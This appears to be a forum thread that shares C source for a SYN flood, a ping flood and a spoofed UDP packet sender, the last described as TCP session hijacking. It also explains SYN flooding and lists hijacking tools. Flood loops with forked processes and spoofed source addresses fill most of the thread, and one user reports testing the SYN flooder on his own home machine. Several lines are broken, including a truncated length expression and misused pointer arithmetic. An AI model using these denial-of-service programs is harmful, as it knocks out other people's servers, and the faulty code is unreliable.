Denial of service attack

The piece of C codes below is suppose to perform a SYN FLOOD attack to bug down a server at the other end . I am only familiar with elementary programming in C will rely on those among us who are familiar with advance programming in C to make their observations and correlate the codes with the explanation below.


*************************************CUT
HERE**********************************

/* To keep code as small as possible, a checksum have been included which may
* result in some packet loss. */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <netdb.h>
int main(int argc, char *argv[])
{
if(argc < 3)
{
printf("Usage: %s <host> <port>\n", argv[0]);
printf("Synflood was written by shaun2k2 - shaunige@yahoo.co.uk\n");
exit(-1);
}

int sock;
char packet[4096]; /* Datagram. */
struct sockaddr_in dest;
struct iphdr *ip = (struct iphdr *) packet;
struct tcphdr *tcp = (struct tcphdr *) packet + sizeof(struct iphdr);
struct hostent *he;
if((he = gethostbyname(argv[1])) == NULL) {
printf("Couldn't resolve hostname!\n");
exit(-1);
}

if((sock = socket (AF_INET, SOCK_RAW, IPPROTO_TCP)) == -1) {
printf("Socket failed!\n");
printf("Must be root to make raw socket.\n");
exit(-1);
}
dest.sin_family = AF_INET;
dest.sin_port = htons(atoi(argv[2]));
dest.sin_addr = *((struct in_addr *)he->h_addr);
memset(packet, 0, 4096); // Zero out packet.

// Fill in IP headers.
ip->ihl = 5;
ip->version = 4;
ip->tot_len = sizeof(struct iphdr) + sizeof(struct tcphdr);
ip->id = htons(1337);
ip->saddr = inet_addr("127.0.0.1");
ip->daddr = inet_ntoa(dest.sin_addr);
ip->ttl = 255;
ip->protocol = 6;
ip->check = 0;
ip->tos = 0;
ip->frag_off = 0;

// Fill in TCP headers.
tcp->source = htons(1337);
tcp->dest = htons(atoi(argv[2]));
tcp->seq = htons(random());
tcp->ack = 0;
tcp->syn = 1;
tcp->window = htons(65535);
tcp->check = 0;
tcp->doff = 5;
tcp->rst = 0;
tcp->psh = 0;
tcp->fin = 0;
tcp->urg = 0;
tcp->ack_seq = htons(0);
printf("Syn flooding: %s!\n", argv[1]);
/* Insert some more fork()'s in here, if you want. */
fork();
fork();
while(1) {
sendto(sock, packet, ip->tot_len, 0, (struct sockaddr *)&dest,
sizeof(struct
sockaddr));
}
return(0);
}
*************************************CUT
HERE**********************************





Host C (for Client) sends a SYN packet to host S (for Server) to request a connection, with a spoofed source IP address. Host S then replies to this packet, with a SYN|ACK packet, replying to the spoofed address. The connection request is then placed on the stack until a final ACK is received. But since the source address of the SYN packet was spoofed, the Host S (the server) will never receive an ACK packet, because the host who it sent a SYN|ACK packet to doesn't even exist, so the connection requests stay on the stack! And in a SYN flooding attack, an attacker sends literally hundreds if not thousands of packets a minute, so with all of these thousands of unanswered connection requests sitting on the stack, Host S could be brought to it's knees as it's resources are starved and it's process table is saturated. On some platforms, the machine can be brought to almost a total lockup, and the CPU utilization can be raised dramatically to 100%.

This has become a very popular and effective DoS attack, as it is a pretty easy DoS attack to launch with pre-built tools, and requires minimal knowledge of the victim host.

man Sose code colors are too bright.. edit it to a dark blue or quote it then leave it as black. finding it hard to read tru... gonna be worse for someone who uses goggles...!

Thanks for the nice explanation sose. I got curious about this. So I compiled the code on a linux (Suse based) VMware machine and attacked my oldest tyrannosaurus home computer. Note here that this is a very slow 450Mhz PIII with 256Mb on it, WinXP. Here are the results in brief:

1. CPU usage on the victim did rise to 70%-80% but never caused the machine to hang or stop working. CPU usage dropped to normal again once the attack was stoped.

2. Sniffing the attack shows the following:



The attacker is 192.168.0.3 and the victim is 192.168.0.1.

Unfortunately, If I understand it well, it seems from this that the code did not perform the attack correctly. the SYN as you can see is equal to 0 (in all packets). Although surprisingly, I can see the line tcp->syn = 1; :!:. The other thing is that the source address is the linux machine it self, not random!!.

Needs further digging I guess.

*************************************CUT
HERE**********************************

/* To keep code as small as possible, a checksum have been included which may
* result in some packet loss. */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <netdb.h>
int main(int argc, char *argv[])
{
if(argc < 3)
{
printf("Usage: %s <host> <port>\n", argv[0]);
printf("Synflood was written by shaun2k2 - shaunige@yahoo.co.uk\n");
exit(-1);
}

int sock;
char packet[4096]; /* Datagram. */
struct sockaddr_in dest;
struct iphdr *ip = (struct iphdr *) packet;
struct tcphdr *tcp = (struct tcphdr *) packet + sizeof(struct iphdr);
struct hostent *he;
if((he = gethostbyname(argv[1])) == NULL) {
printf("Couldn't resolve hostname!\n");
exit(-1);
}

if((sock = socket (AF_INET, SOCK_RAW, IPPROTO_TCP)) == -1) {
printf("Socket failed!\n");
printf("Must be root to make raw socket.\n");
exit(-1);
}
dest.sin_family = AF_INET;
dest.sin_port = htons(atoi(argv[2]));
dest.sin_addr = *((struct in_addr *)he->h_addr);
memset(packet, 0, 4096); // Zero out packet.

// Fill in IP headers.
ip->ihl = 5;
ip->version = 4;
ip->tot_len = sizeof(struct iphdr) + sizeof(struct tcphdr);
ip->id = htons(1337);
ip->saddr = inet_addr("127.0.0.1");
ip->daddr = inet_ntoa(dest.sin_addr);
ip->ttl = 255;
ip->protocol = 6;
ip->check = 0;
ip->tos = 0;
ip->frag_off = 0;

// Fill in TCP headers.
tcp->source = htons(1337);
tcp->dest = htons(atoi(argv[2]));
tcp->seq = htons(random());
tcp->ack = 0;
tcp->syn = 1;
tcp->window = htons(65535);
tcp->check = 0;
tcp->doff = 5;
tcp->rst = 0;
tcp->psh = 0;
tcp->fin = 0;
tcp->urg = 0;
tcp->ack_seq = htons(0);
printf("Syn flooding: %s!\n", argv[1]);
/* Insert some more fork()'s in here, if you want. */
fork();
fork();
while(1) {
sendto(sock, packet, ip->tot_len, 0, (struct sockaddr *)&dest,
sizeof(struct
sockaddr));
}
return(0);
}
*************************************CUT
HERE**********************************

I actually got these codes from a friend.
Solo please can you kindly detail your attacks setup using these codes
like number of system, OS, modus oprendi etc

I also present below some codes for ping of death and man in the middle attack





*************************************CUT

HERE**********************************

#include <stdio.h>

#include <stdlib.h>

#include <netinet/in.h>

#include <netdb.h>

#include <netinet/ip.h>

#include <netinet/ip_icmp.h>

int main(int argc, char *argv[]) {

if(argc < 2) {

printf("Usage: %s <host>\n", argv[0]);

exit(0);

}



int sock;

char packet[5000];

char r[5000];

struct sockaddr_in dest;

struct hostent *host;

struct iphdr *ip = (struct iphdr *) packet;

struct icmphdr *icmp = (struct icmp *) packet + sizeof(struct iphdr);

if((host = gethostbyname(argv[1])) == NULL) {

printf("Couldn't resolve host!\n");

exit(-1);

}



if((sock = socket(AF_INET, SOCK_RAW, IPPROTO_ICMP)) == -1) {

printf("Couldn't make socket!\n");

printf("You must be root to create a raw socket.\n");

exit(-1);

}



dest.sin_family = AF_INET;

dest.sin_addr = *((struct in_addr *)host->h_addr);

ip->ihl = 5;

ip->id = htons(1337);

ip->ttl = 255;

ip->tos = 0;

ip->protocol = IPPROTO_ICMP;

ip->version = 4;

ip->frag_off = 0;

ip->saddr = htons("1.3.3.7");

ip->daddr = inet_ntoa(dest.sin_addr);

ip->tot_len = sizeof(struct iphdr) + sizeof(struct icmphdr);

ip->check = 0;

icmp->checksum = 0;

icmp->type = ICMP_ECHO;

icmp->code = 0;

printf("Ping flooding %s!\n", argv[1]);

fork();

fork();

while(1) {

sendto(sock, packet, ip->tot_len, 0, (struct sockaddr *)&dest,

sizeof(struct

sockaddr));

}

return(0);

}




Now lets see the man in the middle attack(sequence number prediction)/tcp session hijacking

This is the ultimate attack in IP spoofing, to gain a connection with a host, pretending to be another host, preferably a trusted host. All that is required is that the attacker can predict the sequence number of the server host's SYN|ACK packet after sending a SYN packet, but this is not as simple task as somebody might think. First, there's the issue of actually guessing the sequence number of this packet of interest, and secondly, there's the issue of the host you are spoofing of answering to the SYN|ACK packet, and sending a RST (reset connection) packet because it was not expecting the SYN|ACK packet. The second problem is actually simpler to deal with. A classic method of preventing the spoofed host from replying to the SYN|ACK packet with a RST is by SYN flooding it





*************************************CUT

HERE**********************************

#include <stdio.h>

#include <stdlib.h>

#include <netinet/in.h>

#include <netdb.h>

#include <netinet/ip.h>

#include <netinet/udp.h>

int main(int argc, char *argv[]) {

if(argc < 2) {

printf("Usage: %s <host>\n", argv[0]);

exit(0);

}



int sock;

char packet[5000];

char msg[50] = "LOSE";

int msglen = strlen(msg);

struct sockaddr_in dest;

struct hostent *host;

int sport = 1337;

struct iphdr *ip = (struct iphdr *) packet;

struct udphdr *udp = (struct udphdr *) packet + sizeof(struct iphdr);

if((host = gethostbyname(argv[1])) == NULL) {

printf("Couldn't resolve host!\n");

exit(-1);

}



if((sock = socket(AF_INET, SOCK_RAW, IPPROTO_ICMP)) == -1) {

printf("Couldn't make socket!\n");

printf("You must be root to create a raw socket.\n");

exit(-1);

}



dest.sin_family = AF_INET;

dest.sin_addr = *((struct in_addr *)host->h_addr);

dest.sin_port = htons(1024);



ip->ihl = 5;

ip->id = htons(1337);

ip->ttl = 255;

ip->tos = 0;

ip->protocol = IPPROTO_UDP;

ip->version = 4;

ip->frag_off = 0;

ip->saddr = htons("1.3.3.7");

ip->daddr = inet_ntoa(dest.sin_addr);

ip->tot_len = sizeof(struct iphdr) + sizeof(struct udphdr);

ip->check = 0;

udp->source = htons(sport);

udp->dest = htons(dest.sin_port);

udp->len = htons(msglen + ;

memcpy(packet + sizeof(ip) + sizeof(udp), msg, msglen);

printf("Sending UDP datagram.\n");

sendto(sock, packet, ip->tot_len, 0, (struct sockaddr *)&dest,

sizeof(struct

sockaddr));

return(0);

}

*************************************CUT

HERE**********************************





There are various interesting tools in relation to TCP session hijacking

attacks. Here's a few popular ones:



HUNT - packetstormsecurity.nl/sniffers/hunt/

Ettercap - ettercap.sourceforge.net/



Further interesting tools related to TCP session Hijacking can be found at



www.packetstormsecurity.org

Solo please can you kindly detail your attacks setup using these codes
like number of system, OS, modus oprendi etc

Sure, Two PCs A and B connected to a small 8 ports switch. Both having windows XP. PC A (with VMware installed) is running a virtual PC having linux (Suse 10.x). I compiled the code on the linux VM using Eclipse IDE + CDT. Then ran the attack on the linux targeting PC B (B is the victim). While doing so, a sniffer (Commview) installed on PC A is sniffing it's NIC that connects the switch. The results above is the output of the sniffer.

Offcourse, the linux VM is using PC A's NIC to connect to the network.